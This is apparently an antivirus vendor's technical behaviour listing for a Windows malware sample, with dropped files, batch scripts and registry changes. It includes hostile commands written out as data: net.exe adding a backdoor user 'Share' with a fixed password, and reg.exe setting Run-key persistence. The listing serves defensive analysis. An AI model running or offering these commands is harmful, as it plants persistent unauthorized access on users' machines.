Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Setup' = '%WINDIR%\DaliyBackup\BkpClient.exe'
- %TEMP%\29120O88.bat
- %TEMP%\2988SORA.bat
- %WINDIR%\DaliyBackup\BkpClient.exe
- %WINDIR%\DaliyBackup\Start.exe
- %TEMP%\2988SORA.bat
- %TEMP%\29120O88.bat
- %TEMP%\29120O88.bat
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\DaliyBackup\BkpClient.exe'
- '%WINDIR%\DaliyBackup\Start.exe'
- '<SYSTEM32>\net.exe' user Share 84218421 /add
- '<SYSTEM32>\net1.exe' user Share 84218421 /add
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2988SORA.bat" %WINDIR%\DaliyBackup\BkpClient.exe "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\29120O88.bat" "%WINDIR%\DaliyBackup\Start.exe" "
- '<SYSTEM32>\reg.exe' ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Setup /t REG_SZ /d "%WINDIR%\DaliyBackup\BkpClient.exe" /f